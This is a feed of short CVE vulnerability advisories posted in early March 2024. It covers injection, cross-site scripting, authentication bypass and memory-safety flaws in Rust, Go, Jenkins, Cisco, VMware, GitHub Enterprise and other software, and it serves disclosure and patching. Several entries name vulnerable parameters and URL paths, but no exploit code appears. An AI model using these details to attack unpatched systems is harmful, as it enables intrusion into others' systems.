🚨 CVE-2024-27308Mio is a Metal I/O library for Rust. When using named pipes on Windows, mio will under some circumstances return invalid tokens that correspond to named pipes that have already been deregistered from the mio registry. The impact of this vulnerability depends on how mio is used. For some applications, invalid tokens may be ignored or cause a warning or a crash. On the other hand, for applications that store pointers in the tokens, this vulnerability may result in a use-after-free. For users of Tokio, this vulnerability is serious and can result in a use-after-free in Tokio. The vulnerability is Windows-specific, and can only happen if you are using named pipes. Other IO resources are not affected. This vulnerability has been fixed in mio v0.8.11. All versions of mio between v0.7.2 and v0.8.10 are vulnerable. Tokio is vulnerable when you are using a vulnerable version of mio AND you are using at least Tokio v1.30.0. Versions of Tokio prior to v1.30.0 will ignore invalid tokens, so they are not vulnerable. Vulnerable libraries that use mio can work around this issue by detecting and ignoring invalid tokens.🎖@cveNotify |
|
| 2024-03-06 20:37:25 |
🚨 CVE-2023-48703RobotsAndPencils go-saml, a SAML client library written in Go, contains an authentication bypass vulnerability in all known versions. This is due to how the `xmlsec1` command line tool is called internally to verify the signature of SAML assertions. When `xmlsec1` is used without defining the enabled key data, the origin of the public key for the signature verification is, unfortunately, not restricted. That means an attacker can sign the SAML assertions themselves and provide the required public key (e.g. an RSA key) directly embedded in the SAML token. Projects still using RobotsAndPencils/go-saml should move to another SAML library or alternatively remove support for SAML from their projects. The vulnerability can likely temporarily be fixed by forking the go-saml project and adding the command line argument `--enabled-key-data` and specifying a value such as `x509` or `raw-x509-cert` when calling the `xmlsec1` binary in the verify function. Please note that this workaround must be carefully tested before it can be used.🎖@cveNotify |
|
| 2024-03-06 19:37:39 |
🚨 CVE-2024-2176Use after free in FedCM in Google Chrome prior to 122.0.6261.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-03-06 19:37:35 |
🚨 CVE-2024-27304pgx is a PostgreSQL driver and toolkit for Go. SQL injection can occur if an attacker can cause a single query or bind message to exceed 4 GB in size. An integer overflow in the calculated message size can cause the one large message to be sent as multiple messages under the attacker's control. The problem is resolved in v4.18.2 and v5.5.4. As a workaround, reject user input large enough to cause a single query or bind message to exceed 4 GB in size.🎖@cveNotify |
|
| 2024-03-06 19:37:34 |
🚨 CVE-2024-27302go-zero is a web and rpc framework. Go-zero allows user to specify a CORS Filter with a configurable allows param - which is an array of domains allowed in CORS policy. However, the `isOriginAllowed` uses `strings.HasSuffix` to check the origin, which leads to bypass via a malicious domain. This vulnerability is capable of breaking CORS policy and thus allowing any page to make requests and/or retrieve data on behalf of other users. Version 1.4.4 fixes this issue.🎖@cveNotify |
|
| 2024-03-06 19:37:30 |
🚨 CVE-2024-272881Panel is an open source Linux server operation and maintenance management panel. Prior to version 1.10.1-lts, users can use Burp to obtain unauthorized access to the console page. The vulnerability has been fixed in v1.10.1-lts. There are no known workarounds.🎖@cveNotify |
|
| 2024-03-06 19:37:29 |
🚨 CVE-2024-25111Squid is a web proxy cache. Starting in version 3.5.27 and prior to version 6.8, Squid may be vulnerable to a Denial of Service attack against HTTP Chunked decoder due to an uncontrolled recursion bug. This problem allows a remote attacker to cause Denial of Service when sending a crafted, chunked, encoded HTTP Message. This bug is fixed in Squid version 6.8. In addition, patches addressing this problem for the stable releases can be found in Squid's patch archives. There is no workaround for this issue.🎖@cveNotify |
|
| 2024-03-06 19:37:28 |
🚨 CVE-2024-24766CasaOS-UserService provides user management functionalities to CasaOS. Starting in version 0.4.4.3 and prior to version 0.4.7, the Casa OS Login page disclosed the username enumeration vulnerability in the login page. An attacker can enumerate the CasaOS username using the application response. If the username is incorrect application gives the error `**User does not exist**`. If the password is incorrect application gives the error `**Invalid password**`. Version 0.4.7 fixes this issue.🎖@cveNotify |
|
| 2024-03-06 18:37:29 |
🚨 CVE-2024-24767CasaOS-UserService provides user management functionalities to CasaOS. Starting in version 0.4.4.3 and prior to version 0.4.7, CasaOS doesn't defend against password brute force attacks, which leads to having full access to the server. The web application lacks control over the login attempts. This vulnerability allows attackers to get super user-level access over the server. Version 0.4.7 contains a patch for this issue.🎖@cveNotify |
|
| 2024-03-06 18:37:26 |
🚨 CVE-2024-24765CasaOS-UserService provides user management functionalities to CasaOS. Prior to version 0.4.7, path filtering of the URL for user avatar image files was not strict, making it possible to get any file on the system. This could allow an unauthorized actor to access, for example, the CasaOS user database, and possibly obtain system root privileges. Version 0.4.7 fixes this issue.🎖@cveNotify |
|
| 2024-03-06 18:37:25 |
🚨 CVE-2023-50167Pega Platform from 7.1.7 to 23.1.1 is affected by an XSS issue with editing/rendering user html content.🎖@cveNotify |
|
| 2024-03-06 18:37:24 |
🚨 CVE-2024-20336A vulnerability in the web-based user interface of Cisco Small Business 100, 300, and 500 Series Wireless APs could allow an authenticated, remote attacker to perform buffer overflow attacks against an affected device. In order to exploit this vulnerability, the attacker must have valid administrative credentials for the device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system.🎖@cveNotify |
|
| 2024-03-06 17:37:51 |
🚨 CVE-2024-28158A cross-site request forgery (CSRF) vulnerability in Jenkins Subversion Partial Release Manager Plugin 1.0.1 and earlier allows attackers to trigger a build.🎖@cveNotify |
|
| 2024-03-06 17:37:50 |
🚨 CVE-2024-28157Jenkins GitBucket Plugin 0.8 and earlier does not sanitize Gitbucket URLs on build views, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to configure jobs.🎖@cveNotify |
|
| 2024-03-06 17:37:49 |
🚨 CVE-2024-28155Jenkins AppSpider Plugin 1.0.16 and earlier does not perform permission checks in several HTTP endpoints, allowing attackers with Overall/Read permission to obtain information about available scan config names, engine group names, and client names.🎖@cveNotify |
|
| 2024-03-06 17:37:44 |
🚨 CVE-2024-28153Jenkins OWASP Dependency-Check Plugin 5.4.5 and earlier does not escape vulnerability metadata from Dependency-Check reports, resulting in a stored cross-site scripting (XSS) vulnerability.🎖@cveNotify |
|
| 2024-03-06 17:37:43 |
🚨 CVE-2024-28150Jenkins HTML Publisher Plugin 1.32 and earlier does not escape job names, report names, and index page titles shown as part of the report frame, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.🎖@cveNotify |
|
| 2024-03-06 17:37:38 |
🚨 CVE-2024-20346A vulnerability in the web-based management interface of Cisco AppDynamics Controller could allow an authenticated, remote attacker to perform a reflected cross-site scripting (XSS) attack against a user of the interface of an affected device. This vulnerability is due to insufficient validation of user-supplied input by the web-based management interface. An attacker could exploit this vulnerability by persuading a user to click a malicious link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.🎖@cveNotify |
|
| 2024-03-06 17:37:37 |
🚨 CVE-2024-20337A vulnerability in the SAML authentication process of Cisco Secure Client could allow an unauthenticated, remote attacker to conduct a carriage return line feed (CRLF) injection attack against a user. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link while establishing a VPN session. A successful exploit could allow the attacker to execute arbitrary script code in the browser or access sensitive, browser-based information, including a valid SAML token. The attacker could then use the token to establish a remote access VPN session with the privileges of the affected user. Individual hosts and services behind the VPN headend would still need additional credentials for successful access.🎖@cveNotify |
|
| 2024-03-06 17:37:32 |
🚨 CVE-2024-20335A vulnerability in the web-based management interface of Cisco Small Business 100, 300, and 500 Series Wireless APs could allow an authenticated, remote attacker to perform command injection attacks against an affected device. In order to exploit this vulnerability, the attacker must have valid administrative credentials for the device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by sending a crafted HTTP request to the web-based management interface of an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system.🎖@cveNotify |
|
| 2024-03-06 17:37:31 |
🚨 CVE-2024-1714An issue exists in all supported versions of IdentityIQ Lifecycle Manager that can result if an entitlement with a value containing leading or trailing whitespace is requested by an authenticated user in an access request.🎖@cveNotify |
|
| 2024-03-06 15:38:01 |
🚨 CVE-2024-25613Authenticated command injection vulnerabilities exist in the ArubaOS command line interface. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2024-03-06 15:38:00 |
🚨 CVE-2024-25612Authenticated command injection vulnerabilities exist in the ArubaOS command line interface. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2024-03-06 15:37:59 |
🚨 CVE-2024-1356Authenticated command injection vulnerabilities exist in the ArubaOS command line interface. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2024-03-06 15:37:58 |
🚨 CVE-2024-2056Services that are running and bound to the loopback interface on the Artica Proxy are accessible through the proxy service. In particular, the "tailon" service is running, running as the root user, is bound to the loopback interface, and is listening on TCP port 7050. Security issues associated with exposing this network service are documented at gvalkov's 'tailon' GitHub repo. Using the tailon service, the contents of any file on the Artica Proxy can be viewed.🎖@cveNotify |
|
| 2024-03-06 15:37:54 |
🚨 CVE-2024-2055The "Rich Filemanager" feature of Artica Proxy provides a web-based interface for file management capabilities. When the feature is enabled, it does not require authentication by default, and runs as the root user.🎖@cveNotify |
|
| 2024-03-06 15:37:53 |
🚨 CVE-2024-23256A logic issue was addressed with improved state management. This issue is fixed in iOS 17.4 and iPadOS 17.4. A user's locked tabs may be briefly visible while switching tab groups when Locked Private Browsing is enabled.🎖@cveNotify |
|
| 2024-03-06 15:37:52 |
🚨 CVE-2024-23243A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in iOS 17.4 and iPadOS 17.4. An app may be able to read sensitive location information.🎖@cveNotify |
|
| 2024-03-06 15:37:51 |
🚨 CVE-2024-23225A memory corruption issue was addressed with improved validation. This issue is fixed in iOS 16.7.6 and iPadOS 16.7.6, iOS 17.4 and iPadOS 17.4. An attacker with arbitrary kernel read and write capability may be able to bypass kernel memory protections. Apple is aware of a report that this issue may have been exploited.🎖@cveNotify |
|
| 2024-03-06 15:37:47 |
🚨 CVE-2023-25681LDAP users on IBM Spectrum Virtualize 8.5 which are configured to require multifactor authentication can still authenticate to the CIM interface using only username and password. This does not affect local users with MFA configured or remote users authenticating via single sign-on. IBM X-Force ID: 247033.🎖@cveNotify |
|
| 2024-03-06 15:37:46 |
🚨 CVE-2024-1374A command injection vulnerability was identified in GitHub Enterprise Server that allowed an attacker with an editor role in the Management Console to gain admin SSH access to the appliance via nomad templates when configuring audit log forwarding. Exploitation of this vulnerability required access to the GitHub Enterprise Server instance and access to the Management Console with the editor role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.11.5, 3.10.7, 3.9.10, and 3.8.15. This vulnerability was reported via the GitHub Bug Bounty program https://bounty.github.com .🎖@cveNotify |
|
| 2024-03-06 15:37:45 |
🚨 CVE-2023-42282The ip package before 1.1.9 for Node.js might allow SSRF because some IP addresses (such as 0x7f.1) are improperly categorized as globally routable via isPublic.🎖@cveNotify |
|
| 2024-03-06 15:37:41 |
🚨 CVE-2023-35947Gradle is a build tool with a focus on build automation and support for multi-language development. In affected versions when unpacking Tar archives, Gradle did not check that files could be written outside of the unpack location. This could lead to important files being overwritten anywhere the Gradle process has write permissions. For a build reading Tar entries from a Tar archive, this issue could allow Gradle to disclose information from sensitive files through an arbitrary file read. To exploit this behavior, an attacker needs to either control the source of an archive already used by the build or modify the build to interact with a malicious archive. It is unlikely that this would go unnoticed. A fix has been released in Gradle 7.6.2 and 8.2 to protect against this vulnerability. Starting from these versions, Gradle will refuse to handle Tar archives which contain path traversal elements in a Tar entry name. Users are advised to upgrade. There are no known workarounds for this vulnerability.### ImpactThis is a path traversal vulnerability when Gradle deals with Tar archives, often referenced as TarSlip, a variant of ZipSlip.* When unpacking Tar archives, Gradle did not check that files could be written outside of the unpack location. This could lead to important files being overwritten anywhere the Gradle process has write permissions.* For a build reading Tar entries from a Tar archive, this issue could allow Gradle to disclose information from sensitive files through an arbitrary file read.To exploit this behavior, an attacker needs to either control the source of an archive already used by the build or modify the build to interact with a malicious archive. It is unlikely that this would go unnoticed.Gradle uses Tar archives for its [Build Cache](https://docs.gradle.org/current/userguide/build_cache.html). These archives are safe when created by Gradle. But if an attacker had control of a remote build cache server, they could inject malicious build cache entries that leverage this vulnerability. This attack vector could also be exploited if a man-in-the-middle can be performed between the remote cache and the build.### PatchesA fix has been released in Gradle 7.6.2 and 8.2 to protect against this vulnerability. Starting from these versions, Gradle will refuse to handle Tar archives which contain path traversal elements in a Tar entry name.It is recommended that users upgrade to a patched version.### WorkaroundsThere is no workaround.* If your build deals with Tar archives that you do not fully trust, you need to inspect them to confirm they do not attempt to leverage this vulnerability.* If you use the Gradle remote build cache, make sure only trusted parties have write access to it and that connections to the remote cache are properly secured.### References* [CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')](https://cwe.mitre.org/data/definitions/22.html)* [Gradle Build Cache](https://docs.gradle.org/current/userguide/build_cache.html)* [ZipSlip](https://security.snyk.io/research/zip-slip-vulnerability)🎖@cveNotify |
|
| 2024-03-06 15:37:40 |
🚨 CVE-2022-20920A vulnerability in the SSH implementation of Cisco IOS Software and Cisco IOS XE Software could allow an authenticated, remote attacker to cause an affected device to reload. This vulnerability is due to improper handling of resources during an exceptional situation. An attacker could exploit this vulnerability by continuously connecting to an affected device and sending specific SSH requests. A successful exploit could allow the attacker to cause the affected device to reload.🎖@cveNotify |
|
| 2024-03-06 15:37:39 |
🚨 CVE-2022-20676A vulnerability in the Tool Command Language (Tcl) interpreter of Cisco IOS XE Software could allow an authenticated, local attacker to escalate from privilege level 15 to root-level privileges. This vulnerability is due to insufficient input validation of data that is passed into the Tcl interpreter. An attacker could exploit this vulnerability by loading malicious Tcl code on an affected device. A successful exploit could allow the attacker to execute arbitrary commands as root. By default, Tcl shell access requires privilege level 15.🎖@cveNotify |
|
| 2024-03-06 14:37:36 |
🚨 CVE-2024-21491Versions of the package svix before 1.17.0 are vulnerable to Authentication Bypass due to an issue in the verify function where signatures of different lengths are incorrectly compared. An attacker can bypass signature verification by providing a shorter signature that matches the beginning of the actual signature.**Note:**The attacker would need to know a victim uses the Rust library for verification,no easy way to automatically check that; and uses webhooks by a service that uses Svix, and then figure out a way to craft a malicious payload that will actually include all of the correct identifiers needed to trick the receivers to cause actual issues.🎖@cveNotify |
|
| 2024-03-06 14:37:35 |
🚨 CVE-2024-21484Versions of the package jsrsasign before 11.0.0 are vulnerable to Observable Discrepancy via the RSA PKCS1.5 or RSAOAEP decryption process. An attacker can decrypt ciphertexts by exploiting the Marvin security flaw. Exploiting this vulnerability requires the attacker to have access to a large number of ciphertexts encrypted with the same key. Workaround The vulnerability can be mitigated by finding and replacing RSA and RSAOAEP decryption with another crypto library.🎖@cveNotify |
|
| 2024-03-06 12:37:26 |
🚨 CVE-2024-2005In Blue Planet® products through 22.12, a misconfiguration in the SAML implementation allows for privilege escalation. Only products using SAML authentication are affected.Blue Planet® has released software updates that address this vulnerability for the affected products. Customers are advised to upgrade their Blue Planet products to the latest software version as soon as possible. The software updates can be downloaded from the Ciena Support Portal.🎖@cveNotify |
|
| 2024-03-06 12:37:25 |
🚨 CVE-2024-25102This vulnerability exists in AppSamvid software due to the usage of a weaker cryptographic algorithm (hash) SHA1 in user login component. An attacker with local administrative privileges could exploit this to obtain the password of AppSamvid on the targeted system.Successful exploitation of this vulnerability could allow the attacker to take complete control of the application on the targeted system.🎖@cveNotify |
|
| 2024-03-06 12:37:24 |
🚨 CVE-2024-1224This vulnerability exists in USB Pratirodh due to the usage of a weaker cryptographic algorithm (hash) SHA1 in user login component. A local attacker with administrative privileges could exploit this vulnerability to obtain the password of USB Pratirodh on the targeted system.Successful exploitation of this vulnerability could allow the attacker to take control of the application and modify the access control of registered users or devices on the targeted system.🎖@cveNotify |
|
| 2024-03-06 11:37:24 |
🚨 CVE-2024-2211Cross-Site Scripting stored vulnerability in Gophish affecting version 0.12.1. This vulnerability could allow an attacker to store a malicious JavaScript payload in the campaign menu and trigger the payload when the campaign is removed from the menu.🎖@cveNotify |
|
| 2024-03-06 10:37:36 |
🚨 CVE-2024-24815CKEditor4 is an open source what-you-see-is-what-you-get HTML editor. A cross-site scripting vulnerability has been discovered in the core HTML parsing module in versions of CKEditor4 prior to 4.24.0-lts. It may affect all editor instances that enabled full-page editing mode or enabled CDATA elements in Advanced Content Filtering configuration (defaults to `script` and `style` elements). The vulnerability allows attackers to inject malformed HTML content bypassing Advanced Content Filtering mechanism, which could result in executing JavaScript code. An attacker could abuse faulty CDATA content detection and use it to prepare an intentional attack on the editor. A fix is available in version 4.24.0-lts.🎖@cveNotify |
|
| 2024-03-06 07:37:26 |
🚨 CVE-2023-52586In the Linux kernel, the following vulnerability has been resolved:drm/msm/dpu: Add mutex lock in control vblank irqAdd a mutex lock to control vblank irq to synchronize vblankenable/disable operations happening from different threads to preventrace conditions while registering/unregistering the vblank irq callback.v4: -Removed vblank_ctl_lock from dpu_encoder_virt, so it is only a parameter of dpu_encoder_phys. -Switch from atomic refcnt to a simple int counter as mutex has now been addedv3: Mistakenly did not change wording in last version. It is done now.v2: Slightly changed wording of commit messagePatchwork: https://patchwork.freedesktop.org/patch/571854/🎖@cveNotify |
|
| 2024-03-06 07:37:25 |
🚨 CVE-2023-52584In the Linux kernel, the following vulnerability has been resolved:spmi: mediatek: Fix UAF on device removeThe pmif driver data that contains the clocks is allocated along withspmi_controller.On device remove, spmi_controller will be freed first, and then devres, including the clocks, will be cleanup.This leads to UAF because putting the clocks will access the clocks inthe pmif driver data, which is already freed along with spmi_controller.This can be reproduced by enabling DEBUG_TEST_DRIVER_REMOVE andbuilding the kernel with KASAN.Fix the UAF issue by using unmanaged clk_bulk_get() and putting theclocks before freeing spmi_controller.🎖@cveNotify |
|
| 2024-03-06 07:37:24 |
🚨 CVE-2023-52583In the Linux kernel, the following vulnerability has been resolved:ceph: fix deadlock or deadcode of misusing dget()The lock order is incorrect between denty and its parent, we shouldalways make sure that the parent get the lock first.But since this deadcode is never used and the parent dir will alwaysbe set from the callers, let's just remove it.🎖@cveNotify |
|
| 2024-03-06 06:37:25 |
🚨 CVE-2024-1771The Total theme for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the total_order_sections() function in all versions up to, and including, 2.1.59. This makes it possible for authenticated attackers, with subscriber-level access and above, to repeat sections on the homepage.🎖@cveNotify |
|
| 2024-03-06 06:37:24 |
🚨 CVE-2024-1760The Appointment Booking Calendar — Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.6.6.20. This is due to missing or incorrect nonce validation on the ssa_factory_reset() function. This makes it possible for unauthenticated attackers to reset the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-03-06 02:37:25 |
🚨 CVE-2024-1939Type Confusion in V8 in Google Chrome prior to 122.0.6261.94 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-03-06 02:37:24 |
🚨 CVE-2024-1938Type Confusion in V8 in Google Chrome prior to 122.0.6261.94 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-03-06 01:37:30 |
🚨 CVE-2023-49977A cross-site scripting (XSS) vulnerability in Customer Support System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the address parameter at /customer_support/index.php?page=new_customer.🎖@cveNotify |
|
| 2024-03-06 01:37:25 |
🚨 CVE-2023-49973A cross-site scripting (XSS) vulnerability in Customer Support System v1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the email parameter at /customer_support/index.php?page=customer_list.🎖@cveNotify |
|
| 2024-03-06 01:37:24 |
🚨 CVE-2023-33677Sourcecodester Lost and Found Information System's Version 1.0 is vulnerable to unauthenticated SQL Injection at "?page=items/view&id=*".🎖@cveNotify |
|
| 2024-03-06 00:38:15 |
🚨 CVE-2024-22889Due to incorrect access control in Plone version v6.0.9, remote attackers can view and list all files hosted on the website via sending a crafted request.🎖@cveNotify |
|
| 2024-03-06 00:38:08 |
🚨 CVE-2023-43318TP-Link JetStream Smart Switch TL-SG2210P 5.0 Build 20211201 allows attackers to escalate privileges via modification of the 'tid' and 'usrlvl' values in GET requests.🎖@cveNotify |
|
| 2024-03-06 00:38:07 |
🚨 CVE-2023-38944An issue in Multilaser RE160V firmware v12.03.01.09_pt and Multilaser RE163V firmware v12.03.01.10_pt allows attackers to bypass the access control and gain complete access to the application via modifying a HTTP header.🎖@cveNotify |
|
| 2024-03-06 00:38:06 |
🚨 CVE-2023-44186An Improper Handling of Exceptional Conditions vulnerability in AS PATH processing of Juniper Networks Junos OS and Junos OS Evolved allows an attacker to send a BGP update message with an AS PATH containing a large number of 4-byte ASes, leading to a Denial of Service (DoS). Continued receipt and processing of these BGP updates will create a sustained Denial of Service (DoS) condition.This issue is hit when the router has Non-Stop Routing (NSR) enabled, has a non-4-byte-AS capable BGP neighbor, receives a BGP update message with a prefix that includes a long AS PATH containing large number of 4-byte ASes, and has to advertise the prefix towards the non-4-byte-AS capable BGP neighbor.Note: NSR is not supported on the SRX Series and is therefore not affected by this vulnerability.This issue affects:Juniper Networks Junos OS: * All versions prior to 20.4R3-S8; * 21.1 versions 21.1R1 and later; * 21.2 versions prior to 21.2R3-S6; * 21.3 versions prior to 21.3R3-S5; * 21.4 versions prior to 21.4R3-S5; * 22.1 versions prior to 22.1R3-S4; * 22.2 versions prior to 22.2R3-S2; * 22.3 versions prior to 22.3R2-S2, 22.3R3-S1; * 22.4 versions prior to 22.4R2-S1, 22.4R3.Juniper Networks Junos OS Evolved * All versions prior to 20.4R3-S8-EVO; * 21.1 versions 21.1R1-EVO and later; * 21.2 versions prior to 21.2R3-S6-EVO; * 21.3 versions prior to 21.3R3-S5-EVO; * 21.4 versions prior to 21.4R3-S5-EVO; * 22.1 versions prior to 22.1R3-S4-EVO; * 22.2 versions prior to 22.2R3-S2-EVO; * 22.3 versions prior to 22.3R2-S2-EVO, 22.3R3-S1-EVO; * 22.4 versions prior to 22.4R2-S1-EVO, 22.4R3-EVO.🎖@cveNotify |
|
| 2024-03-05 22:37:32 |
🚨 CVE-2024-1898Improper access control in the notification feature in Devolutions Server 2023.3.14.0 and earlier allows a low privileged user to change notifications settings configured by an administrator.🎖@cveNotify |
|
| 2024-03-05 22:37:26 |
🚨 CVE-2024-1764Improper privilege management in Just-in-time (JIT) elevation module in Devolutions Server 2023.3.14.0 and earlier allows a user to continue using the elevated privilege even after the expiration under specific circumstances🎖@cveNotify |
|
| 2024-03-05 22:37:25 |
🚨 CVE-2024-20747Acrobat Reader versions 20.005.30539, 23.008.20470 and earlier are affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-03-05 22:37:24 |
🚨 CVE-2021-45810GlobalProtect-openconnect versions prior to 2.0.0 (exclusive) are affected by incorrect access control in GPService through DBUS, GUI. The way GlobalProtect-Openconnect is set up enables arbitrary users to start a VPN connection to arbitrary servers. By hosting an openconnect compatible server, the attack can redirect the entire host's traffic via their own server.🎖@cveNotify |
|
| 2024-03-05 21:37:32 |
🚨 CVE-2024-25611Authenticated command injection vulnerabilities exist in the ArubaOS command line interface. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as a privileged user on the underlying operating system.🎖@cveNotify |
|
| 2024-03-05 21:37:25 |
🚨 CVE-2023-50693An issue in Jester v.0.6.0 and before allows a remote attacker to send a malicious crafted request.🎖@cveNotify |
|
| 2024-03-05 21:37:24 |
🚨 CVE-2019-10271An issue was discovered in the Ultimate Member plugin 2.39 for WordPress. It allows unauthorized profile and cover picture modification. It is possible to modify the profile and cover picture of any user once one is connected. One can also modify the profiles and cover pictures of privileged users. To perform such a modification, one first needs to (for example) intercept an upload-picture request and modify the user_id parameter.🎖@cveNotify |
|
| 2024-03-05 21:07:32 |
🚨 CVE-2023-40548A buffer overflow was found in Shim in the 32-bit system. The overflow happens due to an addition operation involving a user-controlled value parsed from the PE binary being used by Shim. This value is further used for memory allocation operations, leading to a heap-based buffer overflow. This flaw causes memory corruption and can lead to a crash or data integrity issues during the boot phase.🎖@cveNotify |
|
| 2024-03-05 20:37:32 |
🚨 CVE-2022-22399IBM Aspera Faspex 5.0.0 and 5.0.1 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 222562.🎖@cveNotify |
|
| 2024-03-05 20:37:25 |
🚨 CVE-2024-1354A command injection vulnerability was identified in GitHub Enterprise Server that allowed an attacker with an editor role in the Management Console to gain admin SSH access to the appliance via the `syslog-ng` configuration file. Exploitation of this vulnerability required access to the GitHub Enterprise Server instance and access to the Management Console with the editor role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.11.5, 3.10.7, 3.9.10, and 3.8.15. This vulnerability was reported via the GitHub Bug Bounty program.🎖@cveNotify |
|
| 2024-03-05 20:37:24 |
🚨 CVE-2023-38995An issue in SCHUHFRIED v.8.22.00 allows remote attacker to obtain the database password via crafted curl command.🎖@cveNotify |
|
| 2024-03-05 20:07:36 |
🚨 CVE-2024-21370Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-03-05 20:07:31 |
🚨 CVE-2024-21368Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-03-05 20:07:30 |
🚨 CVE-2024-21365Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-03-05 20:07:26 |
🚨 CVE-2024-21360Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-03-05 20:07:25 |
🚨 CVE-2024-21350Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-03-05 20:07:24 |
🚨 CVE-2023-44324Adobe FrameMaker versions 2022 and earlier are affected by an Improper Authentication vulnerability that could result in a Security feature bypass. An unauthenticated attacker can abuse this vulnerability to access the API and leak default admin's password. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2024-03-05 19:07:52 |
🚨 CVE-2024-22254VMware ESXi contains an out-of-bounds write vulnerability. A malicious actor with privileges within the VMX process may trigger an out-of-bounds write leading to an escape of the sandbox.🎖@cveNotify |
|
| 2024-03-05 19:07:51 |
🚨 CVE-2024-22252VMware ESXi, Workstation, and Fusion contain a use-after-free vulnerability in the XHCI USB controller. A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine's VMX process running on the host. On ESXi, the exploitation is contained within the VMX sandbox whereas, on Workstation and Fusion, this may lead to code execution on the machine where Workstation or Fusion is installed.🎖@cveNotify |
|
| 2024-03-05 19:07:46 |
🚨 CVE-2024-27929ImageSharp is a managed, cross-platform, 2D graphics library. A heap-use-after-free flaw was found in ImageSharp's InitializeImage() function of PngDecoderCore.cs file. This vulnerability is triggered when an attacker passes a specially crafted PNG image file to ImageSharp for conversion, potentially leading to information disclosure. This issue has been patched in version 3.1.3.🎖@cveNotify |
|
| 2024-03-05 19:07:45 |
🚨 CVE-2024-27563A Server-Side Request Forgery (SSRF) in the getFileFromRepo function of WonderCMS v3.1.3 allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the pluginThemeUrl parameter.🎖@cveNotify |
|
| 2024-03-05 19:07:41 |
🚨 CVE-2024-24098Code-projects Scholars Tracking System 1.0 is vulnerable to SQL Injection via the News Feed.🎖@cveNotify |
|
| 2024-03-05 19:07:40 |
🚨 CVE-2024-27198In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible🎖@cveNotify |
|
| 2024-03-05 19:07:39 |
🚨 CVE-2024-21352Microsoft WDAC OLE DB provider for SQL Server Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-03-05 18:37:30 |
🚨 CVE-2024-22255VMware ESXi, Workstation, and Fusion contain an information disclosure vulnerability in the UHCI USB controller. A malicious actor with administrative access to a virtual machine may be able to exploit this issue to leak memory from the vmx process.🎖@cveNotify |
|
| 2024-03-05 18:37:26 |
🚨 CVE-2024-22254VMware ESXi contains an out-of-bounds write vulnerability. A malicious actor with privileges within the VMX process may trigger an out-of-bounds write leading to an escape of the sandbox.🎖@cveNotify |
|
| 2024-03-05 18:37:25 |
🚨 CVE-2024-22545An issue was discovered in TRENDnet TEW-824DRU version 1.04b01, allows unauthenticated attackers to execute arbitrary code via the system.ntp.server parameter in the sub_420AE0() function. The attack can be launched remotely.🎖@cveNotify |
|
| 2024-03-05 18:37:24 |
🚨 CVE-2023-43787A vulnerability was found in libX11 due to an integer overflow within the XCreateImage() function. This flaw allows a local user to trigger an integer overflow and execute arbitrary code with elevated privileges.🎖@cveNotify |
|
| 2024-03-05 18:07:25 |
🚨 CVE-2024-1369A command injection vulnerability was identified in GitHub Enterprise Server that allowed an attacker with an editor role in the Management Console to gain admin SSH access to the appliance when setting the username and password for collectd configurations. Exploitation of this vulnerability required access to the GitHub Enterprise Server instance and access to the Management Console with the editor role. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.12 and was fixed in versions 3.11.5, 3.10.7, 3.9.10, and 3.8.15. This vulnerability was reported via the GitHub Bug Bounty program https://bounty.github.com .🎖@cveNotify |
|
| 2024-03-05 18:07:24 |
